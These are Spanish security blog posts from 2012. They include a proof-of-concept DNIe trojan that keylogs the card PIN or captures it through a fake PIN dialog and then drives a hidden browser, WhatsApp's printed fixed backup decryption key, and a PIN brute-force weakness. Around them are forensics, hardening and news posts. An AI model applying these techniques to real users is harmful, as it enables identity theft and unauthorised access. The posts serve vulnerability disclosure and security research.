EL concepto es simple: El DNIe como tal es prácticamente inviolable (acceso a las claves privadas, etc) pero en el momento que tiene que trabajar dentro de un sistema operativo, se vuelve vulnerable

Como expliqué en el turno de preguntas, mi intención era hacer algo basado enteramente en el API de windows, sin emplear hooking ni módulos en el Kernel.

Hoy libero el prototipo del troyano y explicaré su funcionamiento. Hay que destacar que el comportamiento es 'de troyano' pero no efectúa nada dañino. El objetivo es conectarse a la web de la DGT y extraer el saldo de puntos del poseedor del DNI de forma automatizada.

El primer paso es robar el PIN. Para este propósito el troyano utiliza dos métodos:

Keylogging: Es el método mas obvio, el DNIe como tal no aporta ningún tipo de seguridad frente a este tipo de ataques ya que 'caen' en la capa del sistema operativo. Tampoco el software que acompaña al DNIe ofrece ningún tipo de protección.

Obviamente no vale cualquier keylogger, hay que afinar el tiro y saber exactamente cuando logear.

Para ello tenemos que localizar exactamente cuando aparece la ventana que solicita el PIN del DNIe y logear las pulsaciones mientras está presente.

Windows tiene la función perfecta para ello: FindWindow(). Esta función permite localizar cualquier ventana buscándola por su 'caption'. Para averiguar cual es el caption de la ventana del DNIe, podemos usar un programa como WinSpy++ que permite obtener los datos de cualquier ventana.

Por lo tanto, el troyano lo que hace es quedar a la espera hasta que aparece esa ventana y, cuando aparece, usa la función GetAsyncKeyState() para obtener las pulsaciones del teclado.

Hay que señalar que falta por pulir bastante esta funcionalidad del troyano, ya que en estos momentos solo captura combinaciones tecla / número y no combinaciones del tipo @#$%, tampoco discrimina mayúsculas / minúsculas. Como prueba de concepto es suficiente, en sucesivas actualizaciones mejoraré este método.

IntraPhishing: Este método es mucho mas 'divertido' y se basa en un hecho que todo usuario del DNIe conoce bien: la cantidad de veces que sale la ventana de solicitud del PIN. Es muy frecuente y muy normal verla aparecer una y otra vez, lo que me lleva a plantearme la idea de: ¿Y si le envío al usuario una ventana idéntica de solicitud de PIN, pero controlada por mi? El resultado, probablemente, sea que el usuario meta su PIN y nos lo entregue en bandeja. Muy al estilo del Phishing tradicional cuando una web clona a otra.


Fake

Una vez el usuario introduzca el PIN, estará bajo nuestro control y podemos proceder a la siguiente fase.

Con el PIN en la mano, el siguiente paso es conectar a la web de la DGT para solicitar el saldo de puntos. La URL que nos lleva a ello es esta https://aplcr.dgt.es/WEB_COPACI/certificado/irAntecedentes.faces

Para llegar a ella vamos a usar Internet Explorer y su objeto OLE InternetExplorer.Application

Para el que no lo sepa, Internet Explorer (así como otros muchos programas) ponen a disposición del desarrollador lo que se denominan 'Objetos OLE/COM' que permiten automatizar tareas de forma desatendida. En el caso de Explorer, queremos que navegue hacia la web de la DGT.

Antes de eso, y dado que va a haber actividad en la pantalla del PC, es necesario que el troyano 'espere' a que el PC esté inactivo para realizar la navegación (van a verse las ventanas de solicitud del PIN) para ello usaremos la función GetLastInputInfo() que permite determinar el tiempo que un PC ha estado inactivo. En el caso del troyano, viene configurado para 6 segundos, obviamente en un escenario real, sería necesario una ventana de tiempo mayor.

Una vez el PC esté desatendido, el troyano instancia un Internet Explorer cuya ventana está oculta, y navega hacia la web de la DGT.

Problema: Vamos a necesitar rellenar varias veces la ventana de solicitud del PIN.

Solución: Lanzamos un hilo que constantemente esté buscando la ventana del DNIe y cuando aparezca, enviamos el PIN (que ya tenemos) haciendo uso de la función SendInput() que permite simular las pulsaciones del teclado.

Una vez completado el proceso, el troyano 'parsea' la respuesta de la web de la DGT y obtiene el saldo de puntos.

Aquí podéis ver un vídeo del troyano en acción con el modo IntraPhishing

Cabe destacar que si bien este 'kit' está adaptado al DNIe, usando estas mismas técnicas se podría atacar cualquier otra SmartCard.

En este ejemplo tan solo se ha obtenido una información más o menos confidencial pero se podría adaptar para, por ejemplo, obtener la declaración de la renta o modificar los datos fiscales

Podéis descargar 'DNI-E Trojan KIT' desde aquí

WhatsApp Forensics

noreply@blogger.com (Contribuciones) — Tue, 15 May 2012 06:30:00 +0000

Siguiendo la línea de algunos posts sobre la aplicación WhatsApp (que de seguro todos conocemos), en este post me gustaría presentaros una herramienta para facilitar la extracción e interpretación de los datos generados por esta aplicación.

Si bien es cierto que la aplicación cifra los logs de los mensajes cuando realiza el backup en la sdcard, todos estos registros así como las conversaciones actuales, agenda de contactos y demás ficheros propios de la aplicación, se encuentran sin cifrar en la memoria interna del dispositivo, de tal forma, que accediendo a la memoria del dispositivo podremos extraer dichos ficheros para analizarlos en otro entorno.

La aplicación que me gustaría presentaros está escrita en Python (DJango) y aunque es una versión Beta y espero poder seguir agregándole más funcionalidades, nos facilitará bastante la tarea a la hora de interpretar la información basándose en los registros de los siguientes ficheros:

wa.db (agenda de contactos)
msgstore.db (conversaciones actuales)
whatsapp-YYYY-MM-DD.log.gz (registro de conversaciones)
msgstore-YYYY-MM-DD.X.db.crypt (registro de conversaciones cifrado)

Listado de archivos de interés

Nota: Como registro de mensajes solo se usará msgstore.db, pero podemos reemplazar este archivo por cualquiera de los registros de mensajes guardados. Para descargar la aplicación, podemos hacerlo desde la URL del proyecto descargando el fichero zip/tgz o clonando el repositorio:

~$ git clone git://github.com/sch3m4/wforensic.git Cloning into 'wforensic'... remote: Counting objects: 136, done. remote: Compressing objects: 100% (117/117), done. remote: Total 136 (delta 11), reused 135 (delta 10) Receiving objects: 100% (136/136), 364.66 KiB | 163 KiB/s, done. Resolving deltas: 100% (11/11), done. ~$

Una vez hecho esto, entramos en el directorio creado y copiamos en él los ficheros wa.db y msgstore.db:

~$ cd wforensic/ ~/wforensic$ cp -v /tmp/*.db . `/tmp/msgstore.db' -> `./msgstore.db' `/tmp/wa.db' -> `./wa.db' ~/wforensic$ ls -1 CHANGELOG LICENSE README msgstore.db tools wa.db wforensic ~/wforensic$

En caso de necesitar utilizar un registro de log, procederemos de la misma manera, descomprimiendo el fichero:

~$ gzip -d whatsapp-2012-05-03.1.log.gz ~$ mv whatsapp-2012-05-03.1.log wforensic/msgstore.db ~$

Hecho esto, podemos iniciar la aplicación y acceder al navegador accediendo al puerto correspondiente, que por defecto es el 8000:

Ejecutando el servidor DJango

Hecho esto, si accedemos a la URL especificada podremos ver como página principal un breve resumen de la actividad:

Index (1/2)

Index (2/2)

Si por el contrario, solo tenemos acceso a los ficheros cifrados, podemos usar el script "tools/decrypt.py" (gracias al post de Alejandro Ramos):

Volcando y descifrando un registro de mensajes desde la sdcard.

Ahora volvemos a acceder a la aplicación y navegar por todos sus apartados para revisar el registro descifrado:

Contactos

Página Principal

En la parte de "Contacts" (como en el resto de la aplicación) se muestran tanto los contactos con WhatsApp como los que no. Cuando un contacto tiene WhatsApp instalado en su dispositivo, aparecerá con el icono (como se muestra) al lado del nombre, el número de mensajes intercambiados y un enlace en su número de teléfono para mostrar la conversación.

En el menú superior de la aplicación, aparecen secciones para ver la lista de contactos, los chats mantenidos, mostrar los mensajes con coordenadas GPS, mensajes con contenido multimedia, etc. Cuando un mensaje posee algún tipo de adjunto (imagen, contacto, coordenadas, etc.) a demás de mostrar el thumbnail del contenido, nos aparecerá un icono al lado del nombre del contacto, con la URL al contenido original, (en el caso de las coordenadas GPS, será un enlace a Google Maps). Y para sorpresa (o no) de muchos, esto es lo que pasa cuando accedemos a la URL original:

Mensajes multimedias

Contenido original

Y finalizando, dos capturas para ver cómo se muestra el listado de chat y las conversaciones:

Chat

Lista de Chats

Como dije al principio del post, se trata de una beta y se le pueden agregar muchas más opciones que espero poder agregar. No obstante, toda contribución de ideas (se incorporarán al TODO) , manual o mejora (serán agregadas lo antes posible) es bienvenida.

Artículo cortesía de Chema García

Desaparece un 11% de páginas de enlaces tras dos meses de Ley Sinde-Wert

noreply@blogger.com (Alejandro Ramos) — Mon, 14 May 2012 06:30:00 +0000

¿Podrá La ley Sinde-Wert cerrar SeriesYonkis? ¿Y SeriesPepito? ¿Y las más de 500 páginas similares? ¿Cómo está afectando la nueva ley a estos sitios de enlaces? ¿Qué medidas se pueden tomar? ¿Las han tomado ya? Estas preguntas trataba de responder hace ya un año en la siguiente entrada: Monitorizando La Ley Sinde - ¿Hasta donde pueden llegar? Un año después, vamos a ver los cambios.

Para este propósito he actualizado la herramienta que construí la vez anterior y añadiendo una nueva variable: páginas que ya no existen.

Una vez puesta en marcha, los resultados son bastantes curiosos, de las 517 páginas un 11% han cerrado y ni si quiera el dominio se ha renovado.

También hay muchas de ellas que han tomado medidas para defenderse cuando sean atacadas. Como hizo SeriesYonkis clonando su dominio.

La siguiente gráfica muestra los resultados finales. Un 33% de páginas pueden ser cerradas rápidamente por mantener alguno de sus componentes críticos en España (DNS o proveedor de acceso), un 58% están completamente fuera y requerirán coordinación con otros gobiernos y un 11% ha desaparecido.

¿Es esto no una victoria de la aplicación de la Ley? Realmente no queda claro, si analizamos los datos del resultado del año pasado, se observa que el 65% de estas páginas no estaban sometidas a la ley directamente, ya que se alojaban fuera.

Otro dato interesante es que ninguna de las webs cerradas tenía un "rank" alto en Alexa, lo que indica que apenas eran populares o tenían tráfico. Para hacernos una idea SeriesYonkis.com está en la posición 2.014 del mundo, nuestro modesto blog en la 121.234 y el más alto de todos los suprimidos en la 257.696.

Los números cambian radicalmente si tan solo se estudian las 122 páginas que se han filtrado por ser los objetivos de la famosa Ley, ya que el 63% de ellas están fuera del territorio nacional.

Las páginas de enlaces de la lista negra que han desaparecido son:

bitpirata.com
conemule.com
conexión24h.com
cowboysdelared.es
estrenosdt1.com
mundonds.net
torments.net

Las páginas que han cerrado del listado original que creamos:

a3magazine.com
barriop2p.com
bitpirata.com
cinemula.com
cinepelis.com
conemule.com
descargasdirectasatope.com
descargasmix.com
dexcarga.org
divoox.com
divxendirecto.com
eliculas21.com
eliteclasicos.com
emutotal.com
estrenosonline.biz
gratispeliculasonline.com
guretorrents.com
hispatorrents.org
ironcine.com
irontorrent.com
locurands.org
mazodivx.com
miselinks.com
mooseries.com
nernsoong.net
okpeliculas.net
pasalaweb.com
pcestrenos.com
peliculaon.com
peliculas-online.cc
pelis-sevillistas56.net
portalestrenos.com
quecanal.com
realfilmz.com
seriestube.net
seriesypelisonline.com
taquillaspa.com
todogratisonline.net
torments.net
verpeli.net
viciopando.com
viciowarez.com
wuapi.com
miserie.es
onlinepelis.es
paginas-infantiles.iespana.es
peliculasflv.es
toptorrent.es
lanzamientosmp3.es
docutube.es
cowboysdelared.es
cantabriatorrent.es
animenojutsu.es
cineyoutube.es

Enlaces de la SECmana - 123

noreply@blogger.com (José A. Guasch) — Sun, 13 May 2012 08:00:00 +0000

La noticia de la semana, sin duda, ha sido la publicación de más de 55,000 cuentas de Twitter mediante 5 posts en pastebin. Al final resultaron ser, en su mayoría, cuentas utilizadas para SPAM o cuentas ya deshabilitadas, pero se encontraban algunas funcionales, como la del actor Mark Ruffalo que encarna a Hulk en la última película de los Vengadores.
Se presenta Passfault, el proyecto OWASP que evalúa la fuerza de contraseñas con precisión suficiente para predecir el tiempo a poder crackearse. Permite hacer mucho más intuitiva y sencilla la creación de contraseñas y políticas de contraseñas.
Abierto el Call For Papers (Solicitud de ponencias) para la BreakPoint 2012, que se celebra en Australia el 17 y 18 de Octubre. Justo a los tres días siguientes, también en Australia, recordamos que se celebra la RuxCON por los mismos organizadores, pero con un talante un poco más especializado.
Bitcoinica, una página de comercio de Bitcoin creada por Zhou Tong de 17 años, ha sido cerrada debido a que se están llevando a cabo una serie de investigaciones de seguridad. Se cree que se ha podido robar casi 18,000 BTC (equivalentes a más de 68,000 euros), tras que el creador comenzó a notar transferencias sospechosas.
Vulnerabilidad en node.js, en versiones anteriores a la 0.6.17, permitiendo la fuga de información.
Publicada la versión 0.11 de Tails, la distribución enfocada a anonimizar al máximo nuestras tareas de navegación promovida por el proyecto Tor, y de la que ya os hablamos en este post. Muchas mejoras y nuevas funcionalidades.
Una actualización del sistema operativo Lion de Apple, la 10.7.3, expone en claro la contraseña de cifrado de los usuarios que utilizan la aplicación FileVault.
Demostración en video de la vulnerabilidad CVE-2012-1675, correspondiente con el TNS Poison de Oracle de Joxean Koret.
Adrián Bravo en Security Et Alii nos presenta dos entornos para realizar pruebas de hacking web, concretamente de Inyección SQL y XPath/XML Injection, SQLol y XMLmao respectivamente.

MiniPwner: Saca partido a tus ETHERNET EXPOSED

noreply@blogger.com (José A. Guasch) — Fri, 11 May 2012 06:01:00 +0000

Mucha gente nos ha preguntado el por qué de la sección ETHERNET EXPOSED, e incluso muchos otros han cuestionado si realmente es importante disponer de tomas de red descuidadas y si realmente pueden ser aprovechadas.

Ayer se dió a conocer una nueva Drop Box, llamada MiniPwner, cuyo atractivo principal es su precio (se puede tener por menos de 50$), que resulta ser mucho más asequible que la ya conocida por todos Pwnie Express (casi 500$).

Estos dispositivos proporcionan el acceso remoto a una red, y sus principales ventajas es su reducido tamaño, por lo que bien pueden pasar desapercibidos.

En el caso de MiniPwner, se trata de un router wireless TP-Link TL-WR703N y un puerto Giga, así como un sistema operativo OpenWRT en el que se han instalado herramientas específicas para tareas de pentesting, como son nmap, tcpdump, nbtscan, etc. ofreciendo la posibilidad de establecer túneles VPN para ejecutar otras herramientas externamente pero manteniendo el acceso. Una vez se coloca en la red, nos podemos conectar mediante WiFi desde una localización próxima y tranquilamente trabajar sobre la red a la que nos hemos conectado. Y como ya habréis visto en los diferentes números de ETHERNET EXPOSED, podríamos acceder a redes de bancos, hospitales, restaurantes, clínicas...siempre y cuando las tomas encontradas ofreciesen un enlace real.

En este enlace del propio producto MiniPwner encontraréis otros proyectos relacionados con estos dispositivos Drop Box, como por ejemplo la WiFi Pineapple de la gente de Hak5: es una fonera escondida dentro de una piña de plástico que aparentemente no es más que un recipiente para zumos, pero que es capaz de crear un punto de acceso WiFi Rogue para "obligar" a los usuarios cercanos a nosotros que se conecten a nuestro punto de acceso haciéndolos creer que es de confianza.

Puedes construir tú mismo tu propia versión de MiniPwner siguiendo este enlace, o directamente pedirlo por 120$ en esta otra dirección.

[+] MiniPwner

Registra cualquier número en TU Me

noreply@blogger.com (Alejandro Ramos) — Thu, 10 May 2012 06:23:00 +0000

La entrada de hoy pretende ser un resumen rápido desde el punto de vista de seguridad de la aplicación TU Me, presentada ayer por Telefónica para móviles iPhone y que se ha mostrado en Internet como la competencia de WhatsApp.

Detrás de TU Me se encuentra la compañía jajah, con sede en California pero origen israelí, está especializada en VoIP y fue adquirida por Telefónica en 2010. Por lo que parece, todo ha sido desarrollado fuera de España y sus sistemas también se encuentran en California.

Teniendo en cuenta la experiencia ganada de ver como funciona WhatsApp he comprobado algunos de los fallos que hemos encontrado y contado. En algunos casos los resultados son buenas noticias y en otros no.

El registro solo se puede hacer mediante la recepción de un SMS, sin posibilidad de recibir una llamada u otro método de validación, como ocurre con su amigo verde.

Cuando se introduce el número, se manda una petición https con ese número de móvil, TU Me responde por SMS un código pin de tan solo cuatro números para verificar que ese teléfono es de nuestra propiedad, ya que como último paso hay que introducirlo en la aplicación, para que sea nuevamente valido. El proceso tendría un esquema similar a esto:

Registro en TU Me

---------------------------------------------------------------------------------------------------------------------------
ACTUALIZACIÓN:
Lo comentado a continuación ha sido solucionado a las pocas horas de publicarse esta información en el blog.

----------------------------------------------------------------------------------------------------------------------------

Desgraciadamente el número de veces que se introduce el PIN no está controlado y con una herramienta como burp es muy fácil automatizar el proceso y registrar el número que queramos en unos minutos.

En otro orden de cosas, revisando el directorio de la aplicación y la base de datos de conversaciones que se almacena en el fichero Connect.sqlite, me he encontrado que guarda la geo localización de todos los mensajes. Aunque no sea necesaria ni se solicite. Una vez mandas tu posición, los siguientes mensajes también llevarán esta información. Con todo lo que ello implica. ¡No hemos aprendido!

Connect.sqlite (geolocalización)

La sorpresa, esta vez buena, ha sido encontrar que las imágenes compartidas no son públicas y requieren autenticación para acceder a ellas. Además de estar solo disponibles por SSL, a diferencia de WhatsApp que cualquiera puede acceder a ellas si conoce la ruta y se sirven sin cifrar.

Almacenamiento de imágenes en https://store.yarnapp.com

Intento de acceso a una imagen sin credenciales

También las conversaciones se hacen usando protocolos cifrados, por lo que será difícil encontrar herramientas del tipo WhatsAppSniffer.

De momento, ¡esto es todo!

Configurando EMETv2.1

noreply@blogger.com (Contribuciones) — Wed, 09 May 2012 04:23:00 +0000

Como ya se ha visto en los posts anteriores (Mitigaciones de seguridad en EMETv2.1 I, II y III), EMET es un programa muy útil para incrementar la seguridad del sistema. Permite añadir mitigaciones de seguridad a aplicaciones que no han sido programadas nativamente para soportarlas. Esto permite que incluso queden protegidas ante vulnerabilidades 0-day que en otras condiciones podrían hacer que el sistema fuese vulnerable a ejecución de código, por ejemplo

EMET soporta diferentes versiones de Windows y niveles de parcheo, pero no todas las mitigaciones están disponibles para todos ellos.

Lo mismo sucede con sistemas de 32 y 64 bits, ya que algunas protecciones sólo están disponibles en 32 bits.

Gracias a los posts anteriores conocemos qué protecciones ofrece EMET y cómo funcionan a bajo nivel. Ahora vamos a ver cómo configurar EMET para sacarle el máximo partido.

Aplicar mitigaciones

Existen dos formas de configurar las protecciones: a nivel de sistema o de ejecutables. Éstas no son mutuamente excluyentes, sino complementarias.

En el apartado Configure System podemos configurar a nivel global ciertas mitigaciones de seguridad (DEP, SEHOP, ASLR) mediante las directivas Always On, Application Opt-Out, Application Opt-In, Disabled). Se explicó cómo funciona cada una de ellas en el apartado DEP del primer post de la serie.

Existen dos perfiles por defecto en esta sección. Si se utiliza Maximum Protection Security nos podemos encontrar con que algunas aplicaciones dan problemas y no funcionan correctamete. Por eso se recomienda utilizar Recommended Security Settings.

En Configure Apps se configuran los binarios que queremos proteger y las mitigaciones que se aplican al mismo. Por defecto se activan todas si el SO las soporta. Las mitigaciones de seguridad que no aparecen en Configure System, se aplican o no en base a si están marcadas mediante el checkbox en la lista de aplicaciones añadidas manualmente.

Es importante tener en mente que se añaden los binarios de aplicaciones indicando la ruta completo, no sólo el nombre del binario. Por lo tanto podríamos tener dos versiones de la misma aplicación protegidas por EMET.

Cuando se realiza una modificación en Configure System o Configure Apps es necesario reiniciar el sistema para aplicar los cambios.

Configuración de seguridad mediante CLI

Existe la posibilidad de configurar EMET mediante CLI, de forma que se podría automatizar el proceso. La configuración mediante GUI es extremadamente útil para una sóla máquina, pero podría ser un problema para implementarlo en varias máquinas. Es aquí donde entra en juego la CLI.

También podemos sacar partido de la posibilidad de importar y exportar la configuración en XML. Sería útil en caso de que las restantes máquinas tengan el mismo software instalado y necesiten la misma configuración de seguridad.

----------------------------------------

Artículo cortesía de David Montero

Debilidades en los sistemas de restitución de credenciales

noreply@blogger.com (Contribuciones) — Tue, 08 May 2012 04:23:00 +0000

Casi siempre cuando hablamos de Seguridad, y más aún de Seguridad Informática, es común escuchar que “una cadena es tan fuerte como su eslabón más débil”. Sí, es casi un cliché, pero no por eso deja de ser verdad.

Con lo omnipresencia de las grandes empresas de servicios de correo gratuito, y con los servicios plus que cada una ofrece (e.g.: calendario, Web disk, Mensajería instantánea, etc.), es común ver cómo la gente protege paranoicamente su cuenta, ya no sólo de correo sino de servicios. Perder la cuenta de correo que usas desde la Universidad o el colegio es peor que perder ~~a tu novia~~ tus tarjetas bancarias, dependiendo de cómo perdiste el acceso a tu cuenta, recuperarla podría ser más complicado que reponer las tarjetas perdidas. Por esta razón, las grandes compañías de servicio de correo electrónico gratuito como Gmail, Hotmail o Yahoo, agregan mecanismos multifactoriales para la recuperación de la cuenta (e.g.: preguntas de seguridad, números telefónicos y cuentas de correo secundarias.) Ahora bien, así como agregan mecanismos varios para la recuperación de la cuenta, también fortalecen los mecanismos de ingreso porque para muchos que nos movemos en el mundo de la seguridad depender únicamente de una clave pareciera ser insuficiente, razón por la cual Gmail agrega, por ejemplo, su doble factor de autenticación.

A propósito de la reciente vulnerabilidad que se encontró en Hotmail, Yahoo y AOL, la cual permitía a cualquier usuario con medianos conocimientos técnicos resetear la clave de cualquiera de estas cuentas, me di a la tarea de reflexionar sobre los mecanismos disponibles para la recuperación de contraseñas en varias de las empresas más grandes que ofrecen este servicio gratuitamente. Una de las opciones que comparten prácticamente todas ellas es la opción de envío de restitución de credenciales a través de un correo secundario previamente asociado por el usuario. El mecanismo en sí es muy lógico, si nos manejamos en un mundo virtual donde el correo es prácticamente la llave de entrada a tu(s) identidad(es) digital(es), es razonable pensar que debes tener más de una cuenta de correo habilitada, y la posibilidad de perder el acceso simultáneamente a ambas cuentas no debería ser algo tan común. No obstante, estos mecanismo de recuperación de contraseñas en términos prácticos representan otra puerta de entrada al correo, y en seguridad, entre más puertas tengas, más puertas tienes que cuidar.

Imaginemos que un usuario A está interesado en ingresar desautorizadamente a la cuenta de un usuario B. Este usuario B tiene su cuenta de correo en Gmail y lo ampara una contraseña irrompible de 16 caracteres combinados entre números, letras y símbolos especiales. Imaginemos también que este usuario A sólo conoce algunos datos básicos del usuario B, datos como el lugar de trabajo, algunos amigos, algunas aficiones, y cualquier detalle que se pueda encontrar en un perfil descuidado de Facebook. Este usuario B tiene como cuenta secundaria asociada la cuenta de correo de su empresa y las preguntas de seguridad convencionales que cualquier usuario podría configurar. Si el usuario A prepara su ataque descartará como primera opción hacer un ataque de fuerza bruta a Gmail, ya sabemos que desde hace años y con la implementación de los validadores de Recaptcha estos ataques se han complicado, en el caso de que aún así decida efectuarlo no le funcionará porque ya sabemos que la contraseña es robusta.

También podría pensar en un ataque más a largo plazo analizando la plataforma de Gmail haciendo recolección de información técnica, escaneo de puertos, análisis de paquetes de red, y cualquier estrategia que busque hallar debilidades en los sistemas de seguridad de Google, lo cual seguramente no le será fácil y mucho menos le garantizará el éxito de la operación. Adivinar las preguntas de seguridad son una posibilidad, sin embargo, se requiere conocer muy bien a la víctima para poder tener acertar la respuesta, al fin de cuenta, cuando se configura la pregunta secreta siempre se está pensando en algo que sólo conozcamos nosotros, al menos debería ser así.

Como tercera y última opción le queda comprometer la cuenta secundaria asociada para ingresar de manera indirecta a la cuenta Gmail. El hecho de que lo logre o no ya es lo de menos, lo que podemos ver aquí es que la seguridad de Gmail es directamente proporcional a la seguridad de la segunda cuenta de correo electrónica asociada:

Si es una cuenta Hotmail, y créanme que un gran porcentaje de asociaciones entre cuentas para recuperación de credenciales está entre Hotmail-Gmail, la seguridad de Gmail será equivalente a la seguridad de Hotmail, la cual se puso en evidencia hace pocos días tal como vimos.
Si la cuenta secundaria es de una empresa, la seguridad de la cuenta de Gmail (y todos sus servicios) será igual a la seguridad de la plataforma tecnológica de esa empresa. Podríamos seguir profundizando el análisis comentando que un gran porcentaje de las empresas que realizan sus implementaciones para correo corporativo no usan conexión SSL para sus usuarios, por lo que con un ataque de MITM quedarían expuestas las credenciales de todas las cuentas que ingresen. Podríamos referir otro tipo de ataques también comunes como los de SQLi el cual afecta a sistemas de correos de empresas muy importantes en la actualidad y a través del cual también se podrían comprometer las credenciales de acceso de cualquier usuario. De igual forma aplicarían los ataques de fuerza bruta para las implementaciones que carecen de Recaptcha o que no controlan el número de intentos de ingreso permitidos.

La conclusión es que si la seguridad es un punto crítico de tu plataforma, debes pensarla en todas las perspectivas y enfoques. No sirve de nada que una empresa invierta millones en tener los sistemas de IDS/IPS más robustos, los Sistemas Operativos con las últimas actualizaciones de seguridad disponibles, los sistemas de monitoreo más completos y que, la recuperación de credenciales dependan de una segunda plataforma que no controlas.

--------------------------------------------------------------

Artículo cortesía de Carlos Rondón A. @phronimos

Descifrando el fichero msgstore.db.crypt de WhatsApp

noreply@blogger.com (Alejandro Ramos) — Mon, 07 May 2012 05:36:00 +0000

La base de datos de mensajes de WhatsApp se guarda en un fichero en formato SQLite. En el caso de los teléfonos IOS este fichero está en la ruta: [ID de App]/Documents/ChatStorage.sqlite y en el caso de los teléfonos Android en: /com.whatsapp/databases/msgstore.db. Este fichero está sin cifrar tal y como decía Yago el año pasado y requiere que el teléfono este jailbreakedo para acceder a el.

En el caso de Android además existe un fichero de backup que se almacena en la tarjeta externa de memoria y que tampoco estaba cifrado. Esto cambió en una actualización que sufrió la aplicación después de los comentarios de Yago. De esta forma si se pierde el teléfono o lo roban, aunque tengan la tarjeta no podrán leer los mensajes.

Por desgracia, el cifrado que utiliza la aplicación (AES-192-ECB) en el fichero de backup siempre la hace usando la misma key (346a23652a46392b4d73257c67317e352e3372482177652c), y ningún factor único de cada dispositivo, por lo que se pueden recuperar los mensajes de cualquier móvil de la misma forma y en pocos segundos.

Si por cualquier motivo os veis en esta situación, para descifrar el fichero y acceder a la base de datos se puede hacer de forma sencilla con OpenSSL (fuente y binario para windows), con el siguiente comando, donde tan solo hay que especificar el fichero de entrada (-in) y el de salida (-out) con los nombres que correspondan:

Para todos aquellos que lo quieran aún más fácil, he montado una web temporal para hacerlo automáticamente subiendo el fichero cifrado: http://www2.unsec.net/whatsapp/.

Una vez descifrado, hay que utilizar un gestor de SQLite para abrir el fichero, como por ejemplo SQLite Administrator

Update 8/5/2012:

Los creadores de Xtract (Fabio Sangiacomo and Martina Weidner) ya habían encontrado esto en Diciembre del 2011 y sacaron su herramienta y un excelente documento explicando como la obtuvieron:

http://forum.xda-developers.com/showthread.php?p=24569917
https://code.google.com/p/hotoloti/downloads/list
https://www.os3.nl/_media/2011-2012/students/ssn_project_report.pdf

Enlaces de la SECmana - 122

noreply@blogger.com (José A. Guasch) — Sun, 06 May 2012 08:00:00 +0000

En Contagio, recopilatorio de malware, han recibido un documento en .doc, que resulta ser un exploit para MS Word sobre Snow Leopard que aprovecha la vulnerabilidad reportada en el MS09-027. Todos los detalles técnicos de este malware se pueden encontrar en este enlace del Microsoft Malware Protection Center.
Finalmente, Microsoft ha expulsado a la empresa china Hangzhou DPTech de su programa Microsoft Active Protections Program por la supuesta fuga de información tras lo ocurrido con la prueba de concepto de la vulnerabilidad del RDP, la cual se filtró el un foro chino y que posteriormente denunció su creador Luigi Auriemma. El anuncio oficial en el blog del MAPP.
El pasado Miércoles se publicó accidentalmente una vulnerabilidad en PHP que fue descubierta en Enero por un equipo de CTF mientras participaban en NullCON, y que permitiría el acceso a información y la ejecución de código de forma remota. Sin duda se trata de una de las vulnerabilidades más importantes de lo que llevamos de año. Chema Alonso y José Selvi han realizado unos profundos análisis sobre ella, en El Lado del Mal y Pentester.es respectivamente.
En Seguridad Apple, se hacen eco de la liberación de una versión de Kon-Boot para sistemas Mac OS X de 64 bits, que permite la creación de un usuario administrador en caso de olvido.
Desde 48Bits nos deleitan con otro nuevo interesante post, esta vez de Gabriel González, sobre cómo jugueteó con un router ADSL Comtrend AR-5381u distribuido por Jazztel para conseguir la ejecución de comandos y la administración remota de una manera más sencilla.
RomanSoft desde su cuenta de twitter proporciona un enlace que recopila casi todos los ficheros del CTF de plaid, concurso organizado por los PPP (Plaid Parliament of Pwning)
La actriz Marta Torné, protagonista de series como El Internado y Los Protegidos, sufre un hackeo de su cuenta de twitter, perdiendo todos sus seguidores (más de 130.000). No sólo los famosos internacionales iban a tener problemas con sus twitters....
En Una al día, nueva vulnerabilidad (CVE-2012-2111) que permite la elevación de privilegios en SAMBA. Si hace dos semanas se informaba de una grave vulnerabilidad remota que afectaría a multitud de dispositivos (CVE-2012-1182), el equipo de Samba acaba de descubrir otro grave fallo (CVE-2012-2111) que afectaría a los usuarios de las versiones 3.4.x hasta la 3.6.4 inclusive.
Aviso de seguridad VMSA-2012-0009 que incluye 5 vulnerabilidades críticas que afectan a VMware Workstation, Player, ESXi y ESX.

Introducción al BYOD

noreply@blogger.com (Alejandro Ramos) — Sat, 05 May 2012 06:00:00 +0000

En SecurityByDefault estamos en la cresta de la ola, y para estarlo hay que subirse a todas las tendencias absurdas y términos comerciales/marketinianos del mercado. El último que suena es BYOD. Las siglas de "Bring Your Own Device", que traducido a español, tiene que ser algo similar a "Cómpratelo tú, que a nosotros nos da la risa", y que define el suceso que ocurre cuando el hardware portátil te lo traes de casa y es de tu propiedad. Como las famosas tabletas o teléfonos inteligentes.

Bajo BYOD ya empiezan a verse los primeros productos que facilitan su integración en las redes de grandes compañías, asegurando que cumplen con los requisitos de seguridad del resto de sistemas y que las mayores amenazas de terminales móviles como son la fuga de información, robo físico, malware, etcétera, quedan controladas.

Así que ya sabes, si quieres molar de verdad en las cenas frikis con tus amigos, has de usar estas siglas o mejor aún, la "consumerización". No esperéis verla en la RAE, la palabra se la he escuchado a un comercial de Apple y tardará por lo menos 3 años en extenderse. Vaya, lo que le saca IOS a Android.

Personalmente uso mi iPad para leer el twitter, las RSS, el mail, PDFs y como plataforma de juegos para el niño. Realmente en todo aquello que sea modo "lectura". Si alguien puede trabajar realmente con él, es que su curro se basa en responder correos con un "si" o un "no" o es un Community Manager, que por cierto, es otro termino del que se podía hablar mucho.

Fin de la rajada.

[Cine de Hackers] Free Rainer (Un juego de inteligencia)

noreply@blogger.com (Yago Jesus) — Fri, 04 May 2012 05:30:00 +0000

El verano pasado tuve la oportunidad de conocer a la 'chica de la tele' y como es lógico, le pedí que me recomendase alguna película sobre 'hacking' que hubiese pasado bajo el radar.

Rápidamente me dijo ¿Has visto Free Rainer? Te va a gustar.

Lo cierto es que es un poco complicado encontrar la película (es Alemana y no tiene el tirón del cine Americano) pero finalmente conseguí hacerme con ella.

A modo de breve resumen contaré que la película gira en torno a un exitoso productor de 'realities' que, estando en la cresta de la ola (premios, excesos, mujeres), sufre un accidente que le hará ver la vida de forma diferente.

Súbitamente se hace consciente de la cantidad de 'basura' que ha generado en forma de programas de TV a cada cual mas idiotizante, y decide cambiar eso.

Para ello, se lanza a hackear el sistema de medición de audiencias para intentar promover otros contenidos en TV.

Lo que me ha gustado de la película es que va bastante mas lejos que las típicas Americanadas: En una película Americana, algún super-oscuro-hacker pergeñaría un descabellado plan empleando algún virus en 3D que lo cambiaría todo.

Esta película es bastante mas 'real', se ve como van avanzando en la investigación, como van cometiendo los típicos errores de prueba / error y en definitiva resulta bastante mas creíble.

Os dejo el trailer en castellano:

FICHA:
Rigor técnico: 4/5
Historia: 4/5
Calificación general: 4/5

